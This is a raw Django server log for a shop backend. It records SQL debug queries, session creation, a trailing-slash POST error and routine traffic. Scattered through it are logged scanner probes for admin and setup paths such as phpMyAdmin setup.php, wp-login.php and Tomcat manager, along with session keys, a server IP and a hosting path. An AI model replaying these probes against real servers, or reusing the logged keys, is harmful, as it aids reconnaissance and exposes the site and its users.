args=(9,) DEBUG 2019-12-28 21:18:07,352 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-28 21:18:07,356 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [28/Dec/2019 21:18:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [28/Dec/2019 21:18:08] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [28/Dec/2019 21:18:08] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [28/Dec/2019 21:20:44] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:25:46] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:31:03] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [28/Dec/2019 21:31:17] "GET /wp-login.php HTTP/1.0" 404 6346 [28/Dec/2019 21:36:47] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:41:50] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:49:30] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:51:43] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:56:46] "GET / HTTP/1.0" 302 0 [28/Dec/2019 21:57:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:12:25] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:17:28] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:22:31] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:27:33] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:34:12] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:39:15] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:48:16] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:54:38] "GET / HTTP/1.0" 302 0 [28/Dec/2019 22:59:41] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:10:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:15:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:20:10] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:25:13] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:30:16] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:38:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:43:20] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:48:23] "GET / HTTP/1.0" 302 0 [28/Dec/2019 23:56:24] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:03:57] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:17:09] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 00:18:57] "GET /robots.txt HTTP/1.0" 404 6341 [29/Dec/2019 00:19:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:22:12] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:27:15] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:32:18] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:38:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:38:16] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:45:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:50:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 00:58:45] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:19:13] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:24:16] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:29:19] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:34:21] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:39:55] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:44:58] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:50:00] "GET / HTTP/1.0" 302 0 [29/Dec/2019 01:55:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:03:40] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:10:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:15:46] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:21:01] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 02:26:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:31:51] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:36:54] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:42:14] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:47:17] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:52:19] "GET / HTTP/1.0" 302 0 [29/Dec/2019 02:57:22] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:01:11] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:22:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:23:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:28:11] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:33:14] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:38:17] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:39:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 03:39:39,039 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'og2az0clomygbhktij2g0z6nsc9v35ou' LIMIT 1; args=('og2az0clomygbhktij2g0z6nsc9v35ou',) DEBUG 2019-12-29 03:39:39,042 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('og2az0clomygbhktij2g0z6nsc9v35ou', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-12T03:39:39.040168+00:00'::timestamptz); args=('og2az0clomygbhktij2g0z6nsc9v35ou', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 12, 3, 39, 39, 40168, tzinfo=)) [29/Dec/2019 03:39:39] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Dec/2019 03:43:34] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:48:37] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:53:39] "GET / HTTP/1.0" 302 0 [29/Dec/2019 03:58:42] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:24:57] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 04:30:00] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:35:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:37:43] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:40:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:46:00] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:47:31] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 04:50:47] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [29/Dec/2019 04:50:49] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=212 HTTP/1.0" 404 6422 Not Found: /xyzx/SendMail.asp [29/Dec/2019 04:50:50] "GET /xyzx/SendMail.asp?ArticleID=330 HTTP/1.0" 404 6376 [29/Dec/2019 04:51:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 04:56:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:01:42] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:10:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:15:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:20:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:27:31] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:32:33] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:41:56] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:48:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 05:57:15] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:03:17] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:10:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:15:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:20:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:29:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:34:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:39:13] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:44:15] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:49:55] "GET / HTTP/1.0" 302 0 [29/Dec/2019 06:54:58] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:00:00] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:04:20] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 07:10:59] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:13:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 07:13:15,006 utils 2749 140297233225472 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gcy9tf61uap2yjj2yjvw6et5jveaaxd5' LIMIT 1; args=('gcy9tf61uap2yjj2yjvw6et5jveaaxd5',) DEBUG 2019-12-29 07:13:15,009 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gcy9tf61uap2yjj2yjvw6et5jveaaxd5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-12T07:13:15.007236+00:00'::timestamptz); args=('gcy9tf61uap2yjj2yjvw6et5jveaaxd5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 12, 7, 13, 15, 7236, tzinfo=)) [29/Dec/2019 07:13:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Dec/2019 07:13:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 07:13:15,471 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm28ps6si890ina7xn2rbd92nhdiosy41' LIMIT 1; args=('m28ps6si890ina7xn2rbd92nhdiosy41',) DEBUG 2019-12-29 07:13:15,473 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m28ps6si890ina7xn2rbd92nhdiosy41', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-12T07:13:15.472047+00:00'::timestamptz); args=('m28ps6si890ina7xn2rbd92nhdiosy41', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 12, 7, 13, 15, 472047, tzinfo=)) [29/Dec/2019 07:13:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Dec/2019 07:13:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 07:13:15,786 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '68621cr3g5o3t1z6wqqxu7jwxqj35x97' LIMIT 1; args=('68621cr3g5o3t1z6wqqxu7jwxqj35x97',) DEBUG 2019-12-29 07:13:15,788 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('68621cr3g5o3t1z6wqqxu7jwxqj35x97', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-12T07:13:15.787273+00:00'::timestamptz); args=('68621cr3g5o3t1z6wqqxu7jwxqj35x97', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 12, 7, 13, 15, 787273, tzinfo=)) [29/Dec/2019 07:13:15] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Dec/2019 07:16:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:21:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:26:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:31:46] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:36:49] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:41:52] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:46:55] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:52:26] "GET / HTTP/1.0" 302 0 [29/Dec/2019 07:57:29] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:05:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:13:19] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:18:22] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:23:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:28:30] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:32:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:34:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:39:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:40:02] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 08:44:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 08:49:31] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 08:53:02] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [29/Dec/2019 08:53:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=213 HTTP/1.0" 404 6422 Not Found: /xyzx/SendMail.asp [29/Dec/2019 08:53:27] "GET /xyzx/SendMail.asp?ArticleID=331 HTTP/1.0" 404 6376 [29/Dec/2019 08:55:01] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:00:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 Not Found: /phpMyAdmin/scripts/setup.php [29/Dec/2019 09:05:38] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6394 Not Found: /pma/scripts/setup.php [29/Dec/2019 09:05:39] "GET /pma/scripts/setup.php HTTP/1.0" 404 6373 Not Found: /myadmin/scripts/setup.php [29/Dec/2019 09:05:39] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6385 [29/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:16:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:21:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:26:12] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:31:43] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:37:00] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:46:20] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:46:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 09:46:54,913 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd9kxdts6nduzq80bcwz0wbxh84alou7r' LIMIT 1; args=('d9kxdts6nduzq80bcwz0wbxh84alou7r',) DEBUG 2019-12-29 09:46:54,914 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d9kxdts6nduzq80bcwz0wbxh84alou7r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-12T09:46:54.913825+00:00'::timestamptz); args=('d9kxdts6nduzq80bcwz0wbxh84alou7r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 12, 9, 46, 54, 913825, tzinfo=)) [29/Dec/2019 09:46:54] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Dec/2019 09:47:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:51:23] "GET / HTTP/1.0" 302 0 [29/Dec/2019 09:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 09:57:39] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:15:36] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:18:21] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:23:23] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:28:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:30:12] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:33:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:39:01] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:44:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:49:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 10:54:09] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [29/Dec/2019 10:54:29] "GET /manager/html HTTP/1.0" 404 6346 [29/Dec/2019 10:59:42] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [29/Dec/2019 11:09:00] "GET /proxy.php HTTP/1.0" 404 6342 [29/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:15:13] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 11:20:15] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:27:43] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:32:46] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:41:21] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:46:23] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:51:26] "GET / HTTP/1.0" 302 0 [29/Dec/2019 11:56:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:05:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:11:36] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:12:56] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:22:41] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:27:44] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:32:46] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:37:49] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:43:10] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:48:13] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:53:16] "GET / HTTP/1.0" 302 0 [29/Dec/2019 12:58:17] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:10:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:23:44] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:28:47] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:30:24] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:33:49] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:38:52] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:44:20] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:50:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 13:55:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:15:19] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:20:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 14:23:55] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [29/Dec/2019 14:23:56] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=214 HTTP/1.0" 404 6422 Not Found: /jyky/Print.asp [29/Dec/2019 14:23:58] "GET /jyky/Print.asp?ArticleID=375 HTTP/1.0" 404 6367 [29/Dec/2019 14:25:29] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:30:31] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:35:34] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:40:36] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:46:00] "GET / HTTP/1.0" 302 0 [29/Dec/2019 14:51:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:00:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 Not Found: /index.php [29/Dec/2019 15:08:17] "GET /index.php HTTP/1.0" 404 6337 [29/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:11:10] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:16:29] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:21:38] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [29/Dec/2019 15:22:07] "POST /editBlackAndWhiteList HTTP/1.0" 500 64011 [29/Dec/2019 15:26:47] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:31:59] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:37:27] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:42:55] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:51:49] "GET / HTTP/1.0" 302 0 [29/Dec/2019 15:56:51] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:03:22] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:10:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:15:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:20:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:29:26] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:34:29] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:39:32] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:44:35] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:45:38] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:50:01] "GET / HTTP/1.0" 302 0 [29/Dec/2019 16:55:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:10:57] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:15:59] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:21:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:26:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:31:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:36:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:41:31] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:43:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:46:34] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:51:53] "GET / HTTP/1.0" 302 0 [29/Dec/2019 17:56:56] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:04:22] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:13:01] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:18:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:25:43] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 18:26:29] "GET /robots.txt HTTP/1.0" 404 6341 [29/Dec/2019 18:31:12] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:33:40] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:37:51] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:42:54] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:47:56] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:54:22] "GET / HTTP/1.0" 302 0 [29/Dec/2019 18:59:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:05:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:17:33] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:18:59] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:19:33] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:22:36] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:23:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:27:39] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:27:47] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:35:50] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:40:52] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-29 19:44:53,813 utils 2749 140297233225472 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:44:53,826 utils 2749 140297233225472 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:44:53,833 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:44:53,837 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:44:53,843 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" 